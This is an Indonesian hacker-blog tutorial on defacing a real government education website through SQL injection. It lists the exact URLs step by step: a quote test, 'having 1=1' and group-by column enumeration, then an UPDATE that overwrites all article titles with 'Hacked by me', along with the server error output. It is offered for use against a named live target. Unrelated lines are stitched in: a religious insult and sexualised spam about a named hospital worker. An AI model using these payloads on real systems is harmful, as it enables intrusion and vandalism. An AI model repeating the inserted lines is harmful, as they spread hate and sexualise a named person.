Sql injection diknas.go.id bagian 9 Halo… teman2!! Ketemu lagi dengan makhluk tuhan yang paling ganteng -.-” hehehe kek lagu aja yah… yaudah gak papa kek lagu… yang penting gw tetap ganteng Tutorial kali ini adalah deface melalui url dengan menggunakan sql injection… hhmm… untuk tutor kali ini kita (loe aja kali!!) akan menggunakan sebuah web untuk percobaan… Webnya adalah… http://diknas.go.id/ hehehe… web pemerintah… gak papa kok yang perlu kita lakukan pertama adalah membuka salah satu link artikelnya, contoh : http://diknas.go.id/artikel.asp?naskah_id=102 untuk mengetahui apakah web tersebut terkena bugs sql injection… kita akan menambahkan satu karakter ‘ setelah kode artikel… contoh : http://diknas.go.id/artikel.asp?naskah_id=102′
Tekad orang Kristen hapuskan pelajaran pancasila dasar goblok orang islam !!!!!!!!!!!!!! 1 Oooopppsss keknya terjadi error…. Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Unclosed quotation mark before the character string ‘102′ order by creationdate DESC’. /artikel.asp, line 230 berarti bisa dipastikan klo website tersebut terkena bugs… oke… ayo kita buat error lagi, sampe orgasme… loh!? kali ini kita membuat error dengan : having 1=1;– contoh : http://diknas.go.id/artikel.asp?naskah_id=102′ having 1=1;– errornya seperti ini : Microsoft OLE DB Provider for SQL Server error ‘80040e14′ Column ‘py_Naskah.naskah_id’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /artikel.asp, line 230 py_Naskah.naskah_id ini adalah nama tabel dan kolom database py_Naskah => nama tabel naskah_id => nama kolom sekarang kita cari tau tabel berikutnya… contoh : http://diknas.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.naskah_id having 1=1;– error lagi : Microsoft OLE DB Provider for SQL Server error ‘80040e14′ Column ‘py_Naskah.category’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /artikel.asp, line 230 sekarang kita dapat py_Naskah.category berarti kitambah di urlnya contoh : http://diknas.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.category,py_Naskah.naskah_id having 1=1;– error berikutnya : Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Column ‘py_Naskah.Publish’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /artikel.asp, line 230 urlnya menjadi : http://diknas.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.category,py_Naskah.naskah_id,py_Naskah.Publish having 1=1;– nah kita udah dapat nama kolom judulnya yaitu : py_Naskah.title untuk merubahnya kita menggunakan cara berikut : http://diknas.go.id/artikel.asp?naskah_id=102′ update py_Naskah set title=’Hacked by me’;– Hasilnya Oke that’s all Good Luck http://bl4ckb0t.co.cc/ _________________ What da fuck!!! are u looking for!?
Aminah tangerang montoknya staf rumah sakit tangerang